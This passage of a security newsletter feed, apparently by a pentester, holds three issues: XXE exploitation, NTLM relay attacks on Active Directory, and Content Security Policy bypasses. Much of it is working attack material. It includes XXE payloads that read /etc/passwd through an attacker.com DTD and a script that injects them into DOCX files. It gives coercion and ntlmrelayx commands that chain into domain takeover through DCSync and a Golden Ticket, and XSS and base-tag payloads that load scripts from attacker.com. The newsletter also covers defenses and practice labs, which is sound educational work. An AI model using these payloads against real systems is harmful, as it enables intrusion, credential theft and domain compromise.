&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; error SYSTEM &apos;file:///nonexistent/%file;&apos;&gt;&quot;&gt;
%eval;
%error;
```

**Payload sent to target:**

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY % dtd SYSTEM &quot;http://attacker.com/error.dtd&quot;&gt;
  %dtd;
]&gt;
&lt;root&gt;&lt;/root&gt;
```

The parser tries to access a file at `/nonexistent/[contents of /etc/passwd]`, fails, and includes the file path (with embedded file contents) in the error message.

**Note:** Because of XML specification restrictions on using parameter entities within internal DTDs, this technique requires either an external DTD or repurposing an existing local DTD file on the server.

## XXE in Unexpected Places

Don&apos;t just test plain XML endpoints. XXE hides in formats you wouldn&apos;t expect.

### File Uploads

**SVG images** are XML-based. If an app lets you upload profile pictures and processes SVG files, try embedding an XXE payload:

```xml
&lt;?xml version=&quot;1.0&quot; standalone=&quot;yes&quot;?&gt;
&lt;!DOCTYPE svg [
  &lt;!ENTITY xxe SYSTEM &quot;file:///etc/hostname&quot;&gt;
]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;
  &lt;text&gt;&amp;xxe;&lt;/text&gt;
&lt;/svg&gt;
```

Upload it, and if the app displays or processes the SVG server-side, you might trigger XXE.

**DOCX and XLSX** files are ZIP archives containing XML. Extract one, modify the XML inside (e.g., `word/document.xml`), inject your payload, rezip it, and upload. I&apos;ve seen this work in document preview features and automated processing systems.
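The rezip step is easy to get wrong by hand, so scripting it helps. A standard-library sketch; `inject_payload` is a hypothetical name, and the XXE payload is read from a separate file so no XML needs to live in the script:

```python
import zipfile

def inject_payload(docx_path, out_path, payload_path,
                   member='word/document.xml'):
    # Copy every archive member as-is, swapping in the payload
    # for the target XML part.
    with open(payload_path, 'rb') as f:
        payload = f.read()
    with zipfile.ZipFile(docx_path) as src, \
         zipfile.ZipFile(out_path, 'w', zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = payload if item.filename == member else src.read(item.filename)
            dst.writestr(item, data)
```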

### XInclude Attacks

Sometimes you don&apos;t control the entire XML document, just a single value inside it. Standard XXE won&apos;t work because you can&apos;t define a DOCTYPE. That&apos;s where XInclude comes in.

&lt;details&gt;
&lt;summary&gt;If you control a value in the XML, try this:&lt;/summary&gt;

```xml
&lt;foo xmlns:xi=&quot;http://www.w3.org/2001/XInclude&quot;&gt;
  &lt;xi:include parse=&quot;text&quot; href=&quot;file:///etc/passwd&quot;/&gt;
&lt;/foo&gt;
```
&lt;/details&gt;

XInclude lets you include external files directly in XML elements, bypassing the need for entity declarations.

### Content-Type Switching

Some apps accept `Content-Type: application/json` but also parse `application/xml` if you send it. Try switching your POST request from JSON to XML and see if the endpoint still processes it.

&lt;details&gt;
&lt;summary&gt;From this:&lt;/summary&gt;

```http
POST /api/user HTTP/1.1
Content-Type: application/json

{&quot;username&quot;: &quot;test&quot;}
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;To this:&lt;/summary&gt;

```http
POST /api/user HTTP/1.1
Content-Type: application/xml

&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;
&lt;root&gt;&lt;username&gt;&amp;xxe;&lt;/username&gt;&lt;/root&gt;
```
&lt;/details&gt;

If the backend uses a library that auto-detects content types or falls back to XML parsing, you might trigger XXE on an endpoint that wasn&apos;t designed to accept XML.

## Tools You Need

**Burp Suite** – Essential for intercepting and modifying requests. Burp Collaborator is perfect for OOB testing.

**XXEinjector** – Automates XXE exploitation including OOB exfiltration and enumeration. Supports direct and out-of-band methods (FTP, HTTP, Gopher).
[https://github.com/enjoiz/XXEinjector](https://github.com/enjoiz/XXEinjector)

**DTD Finder** – Lists DTDs and generates XXE payloads using local DTD files. Useful for blind XXE exploitation.
[https://github.com/GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder)

**PayloadsAllTheThings (XXE Section)** – Comprehensive payload collection with classic XXE, OOB, and various exploitation techniques.
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection)

## Where to Practice

**PortSwigger Web Security Academy** – Multiple XXE labs with increasing difficulty. All labs are free:
- [Exploiting XXE to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
- [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
- [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
- [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)

Main XXE page: [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)

**TryHackMe – XXE Injection Room** – Premium room covering in-band, out-of-band, and expansion XXE attacks. Includes exercises chaining XXE with SSRF.
[https://tryhackme.com/room/xxeinjection](https://tryhackme.com/room/xxeinjection)

**Hack The Box – BountyHunter** – Easy-rated Linux machine featuring XXE exploitation to read PHP source files and dump database credentials. Good introduction to practical XXE in a realistic scenario.
[https://app.hackthebox.com/machines/BountyHunter](https://app.hackthebox.com/machines/BountyHunter)

## Defense and Detection

If you&apos;re defending against XXE, here&apos;s what actually works:

**Disable External Entities** – The nuclear option. Most XML libraries have config flags to disable DTD processing entirely. Use them.

```java
// Java example
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature(&quot;http://apache.org/xml/features/disallow-doctype-decl&quot;, true);
```

**Use Simple Data Formats** – If you don&apos;t need XML&apos;s complexity, use JSON. Fewer features = smaller attack surface.

**Input Validation** – Reject any XML containing `DOCTYPE`, `ENTITY`, or `SYSTEM` keywords. Not foolproof, but catches lazy attacks.
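A sketch of that filter in Python (`looks_like_xxe` is a hypothetical name). It is bypassable through tricks like alternate character encodings, which is exactly why it belongs behind parser hardening, never in front of it:

```python
import re

# Defense in depth only; disabling DTDs in the parser is the real fix.
BLOCKLIST = re.compile(r'DOCTYPE|ENTITY|SYSTEM', re.IGNORECASE)

def looks_like_xxe(raw_xml):
    return bool(BLOCKLIST.search(raw_xml))
```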

**Least Privilege** – Run your XML parser with minimal file system access. If it can&apos;t read `/etc/passwd`, XXE becomes much less useful.

**Monitor Outbound Traffic** – Blind XXE relies on exfiltration. Alert on unexpected HTTP requests from your backend to external IPs.

## Wrapping Up

XXE is one of those vulnerabilities that seems straightforward on paper but has a surprising amount of depth. Basic file disclosure is the entry point, but once you understand OOB exfiltration, SSRF chaining, and hunting XXE in unexpected formats like SVG or DOCX, you unlock a whole new class of attack vectors.

The reason XXE keeps appearing in CVEs is that it&apos;s easy to miss. An app might not directly accept XML, but a third-party library processing uploaded files might. Or an API endpoint designed for JSON might fall back to XML parsing. Or a developer might enable XML features &quot;just in case&quot; and never disable them.

So next time you&apos;re testing an app, grep for XML. Check file uploads. Try content-type switching. You might be surprised what you find.

## Coming This Week

This week, probably on Wednesday, I&apos;ll be publishing a new article in the Web3 series: an introduction to how signatures work in Ethereum. We&apos;ll cover the fundamentals of digital signatures, how Ethereum implements them, and why they&apos;re critical for smart contract and wallet security. It&apos;s the perfect starting point before diving into replay attacks and other signature-based exploitation techniques.

Thanks for reading, and happy hunting.

Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>NTLM Relay: Why Authentication in AD is Still Broken</title><link>https://www.kayssel.com/newsletter/issue-21</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-21</guid><description>How to force machines to authenticate to you, relay their credentials, and take over domains</description><pubDate>Sun, 26 Oct 2025 10:00:00 GMT</pubDate><content:encoded>Hey everyone,

It&apos;s been a while since I&apos;ve talked about Active Directory attacks. These days I&apos;m mostly focused on Web3 security at work, so I don&apos;t get to play with Windows environments as much as I used to. But NTLM Relay attacks hold a special place for me.

Back in university, I realized pretty quickly that our curriculum didn&apos;t cover Windows security at all. Everything was Linux, networking fundamentals, maybe some basic web security. But I knew that most companies run Active Directory, and if I wanted to be useful in real environments, I needed to understand how to break into them.

So for my final thesis project, I built [Igris](https://github.com/rsgbengi/Igris), a tool similar to CrackMapExec for attacking AD environments. It forced me to really dig into how SMB, NTLM, Kerberos, and all these protocols actually work under the hood. That project taught me more about offensive security than any class did.

I [wrote a detailed article about NTLM basics](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/) a while back that covers the foundational concepts. This newsletter builds on that and focuses on the newer coercion techniques and relay methods that have emerged over the past few years.

One thing I want to mention upfront: NTLM Relay attacks can generate a lot of noise on the network unless they&apos;re very targeted. Authentication attempts, failed logins, unusual traffic patterns, all of it shows up in logs. So in real engagements, I usually save these for later in the assessment. They tend to work really well, but if you&apos;re trying to stay under the radar, you don&apos;t want to start blasting coercion attacks at every machine on the network. Use them strategically.

And honestly, I needed the refresher myself. When you spend months auditing smart contracts, you start to forget the muscle memory of AD exploitation. So let&apos;s get back into it.

## What NTLM Relay Actually Is

When you authenticate to a Windows machine using NTLM, you&apos;re basically doing a challenge-response exchange. The server sends you a challenge, your client computes a response from that challenge using a hash of your password, sends it back, and the server verifies it.

NTLM Relay takes advantage of a fundamental flaw: if you can intercept that authentication attempt, you can forward it to a different server. You&apos;re not cracking the password. You&apos;re just passing the authentication along to another machine that accepts NTLM.

Here&apos;s the flow:

```
1. Victim tries to authenticate to Attacker
2. Attacker receives the auth attempt
3. Attacker forwards it to Target server
4. Target accepts it (thinks it&apos;s talking to Victim)
5. Attacker now has authenticated session as Victim
```

The key thing to understand: you&apos;re not stealing credentials. You&apos;re hijacking an authentication conversation that&apos;s already happening.

## Why NTLM Still Exists

Good question. Kerberos has been the default since Windows 2000. Why is NTLM still around?

Legacy systems. Third-party applications that don&apos;t support Kerberos. Fallback mechanisms when Kerberos fails. Workgroup environments. And the big one: organizations that never actually disabled it because &quot;something might break.&quot;

Microsoft has been trying to kill NTLM for years. They keep pushing it back. Last I checked, the deprecation timeline got extended again. So for the foreseeable future, NTLM is still in play, which means these attacks still work.

## Forcing Authentication: Coercion Attacks

The hardest part of NTLM Relay used to be getting someone to authenticate to you. You&apos;d set up Responder, poison some LLMNR/NBT-NS traffic, and hope someone mistyped a UNC path.

Then coercion attacks changed everything. These are techniques that abuse legitimate Windows features to force a machine to authenticate to an attacker-controlled server. No user interaction needed.

### PetitPotam

This one made waves in 2021. It abuses the MS-EFSRPC protocol (Encrypting File System Remote Protocol) to trigger authentication. Any domain user can call it, and you can force a Domain Controller to authenticate to you.

```bash
python3 PetitPotam.py attacker-ip target-dc-ip
```

When this came out, it was being used to relay DC authentication to AD CS servers and get certificates that let you impersonate the DC. Instant domain compromise.

### PrinterBug (SpoolSample)

Older but still works. Abuses the Print Spooler service. If the spooler is running (and it usually is), you can force a machine to authenticate to you.

```bash
python3 printerbug.py &apos;domain.local/user:password&apos;@target-ip attacker-ip
```

The beauty of this one is that it works against servers, not just workstations. So you can hit file servers, SQL servers, whatever&apos;s running the spooler.

### DFSCoerce

Exploits the DFS (Distributed File System) protocol. Similar idea, different protocol.

```bash
python3 dfscoerce.py -u user -p password -d domain.local attacker-ip target-ip
```

### ShadowCoerce

Abuses the Volume Shadow Copy service. Less commonly patched than some of the others.

```bash
python3 shadowcoerce.py -d domain.local -u user -p password attacker-ip target-ip
```

There are more. New ones get discovered periodically. The pattern is always the same: find a protocol that triggers authentication, call it remotely, force the target to connect back to you.

## NTLM Relay to SMB

The classic target. If SMB signing is disabled or not required, you can relay NTLM authentication to SMB shares and execute commands.

First, set up your relay:

```bash
ntlmrelayx.py -tf targets.txt -smb2support -c &quot;whoami&quot;
```

The `-tf` flag points to a file with target IPs. `-smb2support` handles SMB2/3. `-c` specifies the command to run when you get a session.

Then trigger authentication from your victim to your attacking machine. If the victim has admin rights on the target, you get code execution.

&lt;details&gt;
&lt;summary&gt;Better yet, drop an interactive shell:&lt;/summary&gt;

```bash
ntlmrelayx.py -tf targets.txt -smb2support -i
```
&lt;/details&gt;

When a relay succeeds, it&apos;ll spawn a local SMB or SOCKS server that you can connect to for an interactive session.

## NTLM Relay to LDAP

This is where things get interesting. Relaying to LDAP lets you modify Active Directory without needing DA privileges.

&lt;details&gt;
&lt;summary&gt;Common attacks:&lt;/summary&gt;

- Add a user to privileged groups (Domain Admins, Enterprise Admins)
- Create a new computer account and abuse RBCD (Resource-Based Constrained Delegation)
- Grant DCSync rights to a user you control
- Modify ACLs to give yourself permissions

&lt;/details&gt;

Set it up:

```bash
ntlmrelayx.py -t ldap://dc-ip --escalate-user lowpriv-user
```

This will try to give DCSync rights to `lowpriv-user`. If you relay a Domain Admin&apos;s auth, it works. Then you just run:

```bash
secretsdump.py domain.local/lowpriv-user:password@dc-ip -just-dc
```

And dump all the hashes in the domain.

Another useful one is creating a computer account and abusing RBCD:

```bash
ntlmrelayx.py -t ldaps://dc-ip --delegate-access
```

When you relay a machine account&apos;s authentication, this creates a new computer object and configures delegation so you can impersonate any user on the relayed machine.

## NTLM Relay to LDAPS (with Signing)

LDAP signing is a common mitigation. But if the target supports LDAPS (LDAP over SSL) and doesn&apos;t enforce channel binding (EPA), you can still relay to it.

```bash
ntlmrelayx.py -t ldaps://dc-ip --escalate-user lowpriv-user
```

The `s` matters. LDAPS on port 636 instead of 389.

## NTLM Relay to HTTP/WebDAV

If you find an internal web app that uses NTLM authentication, you can relay to it. WebDAV endpoints are particularly interesting because they often allow file uploads.

```bash
ntlmrelayx.py -t http://webapp-ip/webdav/
```

If the relayed user has write access, you might be able to drop a webshell.

## NTLM Relay to AD CS (ESC8)

Active Directory Certificate Services is a high-value target. If you can relay to the Web Enrollment endpoint, you can request certificates on behalf of the victim.

```bash
ntlmrelayx.py -t http://adcs-server/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```

If you relay a DC&apos;s authentication and request a DC certificate, you can use that cert to authenticate as the DC. From there, you can DCSync or do whatever you want.

This is exactly what PetitPotam was being used for when it first dropped.

## Putting It All Together

Here&apos;s a realistic attack flow:

&lt;details&gt;
&lt;summary&gt;1. Enumerate the network for machines without SMB signing:&lt;/summary&gt;

```bash
nxc smb targets.txt --gen-relay-list relay-targets.txt
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;2. Start your relay targeting LDAP to escalate a user:&lt;/summary&gt;

```bash
ntlmrelayx.py -tf relay-targets.txt -t ldap://dc-ip --escalate-user attacker
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;3. Trigger authentication from a high-value target (like a DC or admin workstation):&lt;/summary&gt;

```bash
python3 PetitPotam.py your-ip dc-ip
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;4. If the relay succeeds and grants you DCSync rights:&lt;/summary&gt;

```bash
secretsdump.py domain.local/attacker:password@dc-ip -just-dc
```
&lt;/details&gt;

5. Extract the krbtgt hash and create a Golden Ticket. Domain owned.

## Tools You Need

**ntlmrelayx.py** – The core relay tool. Part of Impacket.
[impacket](https://github.com/fortra/impacket)

**Responder** – Poison LLMNR/NBT-NS, capture auth attempts.
[Responder](https://github.com/lgandx/Responder)

**PetitPotam** – Force DC authentication.
[PetitPotam](https://github.com/topotam/PetitPotam)

**Coercer** – All-in-one coercion tool. Supports multiple protocols.
[Coercer](https://github.com/p0dalirius/Coercer)

**NetExec (nxc)** – Enumerate SMB signing, identify relay targets.
[NetExec](https://github.com/Pennyw0rth/NetExec)

## Defense and Detection

If you&apos;re on the blue team side, here&apos;s what actually stops these attacks:

**Enable SMB Signing** – Require it on all machines. This kills relay to SMB.

```powershell
Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options
Microsoft network server: Digitally sign communications (always) - Enabled
```

**LDAP Signing and Channel Binding** – Prevents relay to LDAP/LDAPS.

**Disable NTLM** – The nuclear option. Test heavily first because things will break.

**Patch Print Spooler, disable unnecessary services** – Limits coercion vectors.

**Monitor for coercion attempts** – Look for unusual EFSRPC, RPC, DFS calls in logs. Tools like MDI (Microsoft Defender for Identity) can detect some of these.

## Where to Practice

You need a lab for this. These attacks don&apos;t translate well to static challenges.

**Your own AD lab** – Spin up a Domain Controller, a few Windows clients, disable SMB signing, and practice relaying. I&apos;ve written about setting up offensive labs [here](https://www.kayssel.com/series/offensive-lab/).

**HTB Machines**:

- **Forest** – Good intro to AD attacks, includes NTLM relay to LDAP and DCSync
- **Escape** – NTLM relay in Active Directory environments
- **Mist** – Advanced NTLM relay techniques
- **Reaper** – NTLM relay attack detection and exploitation
- **Reel2** – Phishing to steal Net-NTLMv2 hashes via Outlook Web App

## Wrapping Up

NTLM Relay attacks are old, well-documented, and still work all the time. The core vulnerability hasn&apos;t changed. What has changed is the number of ways you can force authentication without user interaction.

Coercion attacks like PetitPotam turned NTLM Relay from an opportunistic attack into a reliable exploitation technique. Combined with relay to LDAP or AD CS, you can go from any domain user to Domain Admin in minutes.

If you&apos;re pentesting AD environments and you&apos;re not checking for relay opportunities, you&apos;re missing easy wins. And if you&apos;re defending AD, make sure SMB signing is enforced and LDAP signing is enabled. These mitigations actually work.

For me, revisiting these techniques after months of smart contract auditing is like coming back home. The mindset is different, the tools are different, but the satisfaction of chaining together a clean attack path? That never changes.

Thanks for reading. Hope this gives you another tool in your AD toolkit.

## Website Updates

Quick heads up: I&apos;ve completely rebuilt the Kayssel website. Migrated from Ghost CMS to a full Astro static site. The backend is now much faster and cleaner.

**What&apos;s new:**
- **Light theme** - Finally added a light theme option
- **Improved search** - Much more responsive and easier to use
- **Better reading experience** - Enhanced post layout and typography
- **Keybindings on desktop** - Navigate faster with keyboard shortcuts

If you spot anything weird or broken, please let me know. I&apos;ve tested everything, but there&apos;s always something that slips through. Drop me a message on [Twitter](https://twitter.com/rsgbengii) or [Mastodon](https://infosec.exchange/@rsgbengi) if you run into issues.

Stay sharp,
Ruben</content:encoded><category>Newsletter</category><category>active-directory</category><author>Ruben Santos</author></item><item><title>CSP for Pentesters: Understanding the Fundamentals</title><link>https://www.kayssel.com/newsletter/issue-20</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-20</guid><description>Understanding the basics and spotting weak configurations</description><pubDate>Sun, 19 Oct 2025 10:15:31 GMT</pubDate><content:encoded>Hi everyone,

A few weeks ago I was knee-deep in a CTF challenge. Found an XSS vulnerability, felt good about it, crafted my payload, and... nothing. The page just sat there, mocking me. Turns out the CSP was configured in this very specific way that blocked everything I tried. Spent the next hour actually reading the policy line by line, understanding what was allowed and what wasn&apos;t. Eventually got it, but man, it made me realize how little attention I&apos;d been paying to this header.

So that&apos;s what sparked this newsletter. I want to break down how CSP actually works and, more importantly, where people screw it up.

Quick side note: I&apos;m also working on improving the website right now. Adding a white theme because apparently some of you don&apos;t live in dark mode like civilized people, plus keybindings and a bunch of other stuff. Should be ready soon 😄

## What CSP Actually Is

Picture this: you&apos;re running a nightclub. You don&apos;t want random people wandering in off the street, so you hire a bouncer. That bouncer has a list, and if you&apos;re not on it, you&apos;re not getting in. CSP is essentially that bouncer, but for your browser.

The server sends a policy to the browser saying &quot;hey, only execute scripts from these specific places I trust.&quot; When you try to inject malicious code from somewhere else, the browser goes &quot;nope, not on the list&quot; and blocks it. In theory, it&apos;s brilliant. In practice, well, that&apos;s why we&apos;re here.

Here&apos;s what the flow looks like:

```bash
Server: &quot;Content-Security-Policy: script-src &apos;self&apos;&quot;
You: &lt;script src=&quot;https://evil.com/xss.js&quot;&gt;
Browser: *blocked*
Console: &quot;CSP violation: refused to load...&quot;

```

The problem is that configuring this correctly is way harder than it sounds. One wrong directive and the whole thing falls apart.

## How It Actually Works

CSP operates through directives. Think of them as individual rules in that bouncer&apos;s handbook. Each directive controls a different type of resource.

```bash
Content-Security-Policy: script-src &apos;self&apos; https://trusted.com; style-src &apos;self&apos;

```

This tells the browser: &quot;Scripts can come from our domain or trusted.com. CSS can only come from our domain.&quot; Pretty straightforward, right?

But here&apos;s where it gets interesting. If you don&apos;t specify a directive, it falls back to `default-src` if that exists. And if `default-src` doesn&apos;t exist either? No restriction at all. That&apos;s the first place things start to break.
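
That fallback chain is easy to get wrong when reading a policy, so it helps to model it. Here is a toy resolver of my own (not from any library), just to make the rule concrete:

```python
def effective_sources(policy, directive):
    """Return the source list that governs a fetch directive.

    A missing directive falls back to default-src; if that is missing
    too, the resource type is unrestricted (modelled here as None).
    """
    if directive in policy:
        return policy[directive]
    return policy.get("default-src")

policy = {"script-src": ["'self'", "https://trusted.com"], "style-src": ["'self'"]}

print(effective_sources(policy, "script-src"))  # its own directive applies
print(effective_sources(policy, "img-src"))     # no directive, no default-src: None
```

The `img-src` lookup returning `None` is the dangerous case: nothing restricts images, frames, or anything else that lacks both its own directive and a `default-src` fallback.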

## The Directives That Matter

Let me walk you through the ones you&apos;ll actually care about as a pentester.

`script-src` is your main target. This controls what JavaScript can execute. If you can bypass this, you win. Simple as that. Everything else is just noise compared to getting code execution.

`default-src` acts as the fallback. Here&apos;s something that trips people up constantly: if you see `default-src &apos;self&apos;` and nothing else, that means EVERY type of resource uses &apos;self&apos;. Scripts, images, styles, everything. It&apos;s more restrictive than it looks at first glance.

`object-src` controls those old-school tags like `&lt;object&gt;`, `&lt;embed&gt;`, and `&lt;applet&gt;`. Flash, plugins, embedded PDFs. You know what&apos;s funny? People forget about this one all the time. They&apos;ll lock down their scripts super tight and completely forget that object tags exist. That&apos;s an instant bypass opportunity right there.

`base-uri` is the sneaky one. It controls the `&lt;base&gt;` tag, which sets the base URL for the entire document. When this is missing (and it&apos;s missing a lot), you can do some really creative stuff. We&apos;ll get to that in a minute.

## Special Values You Need to Know

CSP has these special keywords that go in single quotes. Understanding what these mean is crucial because they&apos;re often where the vulnerabilities hide.

`&apos;self&apos;` means same origin. Same domain, same protocol, same port. If you&apos;re on `https://example.com`, only stuff from exactly `https://example.com` works. Not even subdomains get a pass.

`&apos;none&apos;` blocks everything. Most restrictive option possible. Not even same-origin content gets through.

`&apos;unsafe-inline&apos;` is where things get interesting. This allows inline scripts, and when you see it, you should get excited. Remember that CTF I mentioned? Its policy was missing this value, which is exactly what made my life difficult. When it&apos;s present, all your traditional XSS techniques just work.

What does inline mean exactly? It&apos;s JavaScript embedded directly in the HTML instead of loaded from a separate file:

```html
&lt;script&gt;alert(1)&lt;/script&gt;
&lt;img src=x onerror=&quot;alert(1)&quot;&gt;
&lt;button onclick=&quot;alert(1)&quot;&gt;Click&lt;/button&gt;

```

All of these are inline. A proper CSP blocks them unless `&apos;unsafe-inline&apos;` is present. But here&apos;s the thing: tons of legacy applications have inline scripts scattered everywhere. Refactoring all of that is a massive undertaking, so devs take the easy way out. They slap `&apos;unsafe-inline&apos;` in there &quot;temporarily&quot; and call it a day. I&apos;ve seen &quot;temporary&quot; fixes that have been in production for three years.

`&apos;unsafe-eval&apos;` is similar but for a different type of code execution. It allows functions like `eval()` that take strings and execute them as code:

```javascript
eval(&apos;alert(1)&apos;);
setTimeout(&apos;alert(1)&apos;, 0);
new Function(&apos;alert(1)&apos;)();

```

If you can control what string gets passed to any of these functions, and `&apos;unsafe-eval&apos;` is present, you&apos;re in.

Then there are the wildcards. `*` means any domain. `https:` means any HTTPS site (which is basically everything now). `data:` allows data URIs, so you can embed code directly in a URL. `*.example.com` allows any subdomain. All of these are red flags because they&apos;re way too permissive.

## Where Things Break Down

Let me show you the misconfigurations I see over and over again in real assessments.

The most common one? `&apos;unsafe-inline&apos;` just sitting there in the policy:

```bash
Content-Security-Policy: script-src &apos;self&apos; &apos;unsafe-inline&apos;

```

When you see this, your standard XSS payloads work perfectly:

```html
&lt;script&gt;alert(document.cookie)&lt;/script&gt;
&lt;img src=x onerror=&quot;alert(1)&quot;&gt;
&lt;svg onload=&quot;alert(1)&quot;&gt;

```

Next up is the missing `base-uri`. Check this out:

```bash
Content-Security-Policy: script-src &apos;self&apos;

```

Looks pretty locked down, right? Script source is restricted to the same origin. But there&apos;s no `base-uri` directive. That means you can inject a `&lt;base&gt;` tag:

```html
&lt;base href=&quot;https://attacker.com/&quot;&gt;

```

&lt;details&gt;
&lt;summary&gt;Now when the page loads its legitimate scripts:&lt;/summary&gt;

```html
&lt;script src=&quot;/js/app.js&quot;&gt;&lt;/script&gt;

```
&lt;/details&gt;


The browser goes &quot;okay, base is attacker.com, so this must be `https://attacker.com/js/app.js`&quot; and loads your malicious script instead. You didn&apos;t even need to inject your own script tag. You just redirected theirs.
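
You can reproduce that resolution with Python&apos;s standard URL logic; `urljoin` follows the same basic rules browsers use to resolve a path against a base:

```python
from urllib.parse import urljoin

# After injecting a base tag pointing at attacker.com, the page's own
# root-relative script path resolves against the attacker's host.
resolved = urljoin("https://attacker.com/", "/js/app.js")
print(resolved)  # https://attacker.com/js/app.js
```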

Then there&apos;s the lazy wildcard approach:

```bash
Content-Security-Policy: script-src &apos;self&apos; https:

```

The `https:` source expression allows scripts from any HTTPS origin. Since 99% of the internet runs on HTTPS now, this is basically worthless:

```html
&lt;script src=&quot;https://attacker.com/xss.js&quot;&gt;&lt;/script&gt;

```

Just works. Same story with `data:` URLs:

```html
&lt;script src=&quot;data:text/javascript,alert(1)&quot;&gt;&lt;/script&gt;

```

&lt;details&gt;
&lt;summary&gt;Subdomain wildcards are another fun one:&lt;/summary&gt;

```bash
Content-Security-Policy: script-src &apos;self&apos; *.example.com

```
&lt;/details&gt;


All you need is ONE vulnerable subdomain. Could be an old forgotten staging server, could be a user upload feature on `uploads.example.com`, doesn&apos;t matter. Find one weakness in any subdomain and the entire CSP falls apart:

```html
&lt;script src=&quot;https://forgotten-staging.example.com/malicious.js&quot;&gt;&lt;/script&gt;

```

Last one: missing `object-src`. When this directive isn&apos;t specified, you can sometimes use `&lt;object&gt;` or `&lt;embed&gt;` tags to bypass everything. It&apos;s browser-dependent and a bit finicky, but it works often enough that it&apos;s worth checking.

## Finding CSP in the Wild

Most of the time you&apos;ll be using Burp Suite or another proxy to intercept traffic. Just look at the response headers in the HTTP history and search for `Content-Security-Policy`. That&apos;s honestly the most practical way when you&apos;re doing actual testing.

&lt;details&gt;
&lt;summary&gt;Quick curl command gets you started:&lt;/summary&gt;

```bash
curl -I https://target.com | grep -i &quot;content-security-policy&quot;

```
&lt;/details&gt;


Or just pop open DevTools (F12), go to the Network tab, reload, click the main request, and look at Response Headers.

Sometimes it&apos;s in a meta tag instead:

```html
&lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;default-src &apos;self&apos;&quot;&gt;

```

One thing to remember: CSP can show up in both the header and a meta tag. When multiple policies are present, the browser enforces all of them, so a resource has to satisfy every policy and the effective result is the most restrictive combination. I&apos;ve seen cases where the header was solid but the meta tag added `&apos;unsafe-inline&apos;`, and the header still blocked inline scripts. Two caveats, though: a meta policy only applies to content loaded after the tag is parsed, and some directives (`frame-ancestors`, `report-uri`, `sandbox`) are ignored in meta tags entirely. Point is, check both.

## Quick Analysis Approach

When you find a CSP, here&apos;s what I do:

First, I look for the obvious wins. Search for `&apos;unsafe-inline&apos;`. If it&apos;s there, I can probably stop looking and just fire off my XSS payload. Search for `&apos;unsafe-eval&apos;` too, because if the app uses any eval-style functions, that&apos;s another easy win.

Check for wildcards: `*`, `https:`, `data:`. These are all way too permissive and usually mean the policy isn&apos;t doing much.

Then I verify what&apos;s missing. Is `base-uri` there? If not, can I inject HTML? If yes to both, base tag injection might work. Is `object-src` there? If not, object/embed tags are worth trying.

Look for subdomain wildcards. If you see `*.example.com`, time to enumerate subdomains and look for vulnerable ones or file upload functionality.

There&apos;s a tool from Google called CSP Evaluator (https://csp-evaluator.withgoogle.com/) that automates a lot of this analysis. Paste in the policy and it&apos;ll tell you what&apos;s weak. Super useful for quick assessments.
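
If you want this triage to be scriptable, the steps above are easy to encode. Here is a rough first-pass linter I&apos;d sketch (heuristics only, the function and message names are my own, and it is no substitute for CSP Evaluator):

```python
def triage_csp(policy):
    """Flag the quick wins from the checklist in a raw CSP header value."""
    findings = []
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]

    script_src = directives.get("script-src", directives.get("default-src", []))
    for risky in ("'unsafe-inline'", "'unsafe-eval'", "*", "https:", "data:"):
        if risky in script_src:
            findings.append(f"script-src allows {risky}")
    if any(src.startswith("*.") for src in script_src):
        findings.append("script-src allows a subdomain wildcard")
    if "base-uri" not in directives:
        findings.append("base-uri missing: try base tag injection")
    if "object-src" not in directives and "default-src" not in directives:
        findings.append("object-src missing: try object/embed tags")
    return findings

print(triage_csp("script-src 'self' 'unsafe-inline' *.example.com"))
```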

## Wrapping Up

So that&apos;s the foundation. What CSP is, how it works, the directives that matter, and the misconfigurations you&apos;ll run into constantly. The reality is that most CSPs have at least one weakness, usually because getting this right is genuinely difficult. It&apos;s not that developers are bad at their jobs. It&apos;s that CSP is complex, and the tradeoffs between security and functionality are real.

Thanks for reading. Hope this helps you spot these issues faster in your next assessment.

Stay sharp, Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Hardware Security Modules: The Fortress Guarding Blockchain&apos;s Crown Jewels</title><link>https://www.kayssel.com/newsletter/issue-19</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-19</guid><description>How exchanges and institutions actually protect billions in crypto assets</description><pubDate>Sun, 12 Oct 2025 09:55:11 GMT</pubDate><content:encoded>Hi everyone,

Something interesting I&apos;ve been studying and seeing in the latest audits I&apos;ve been doing is Hardware Security Modules (HSMs) and how they&apos;re being used in custody solutions. If you&apos;ve ever wondered where exchanges actually store the keys controlling millions in crypto, or what makes institutional custody &quot;enterprise-grade,&quot; this one&apos;s for you.

## What Exactly Is an HSM?

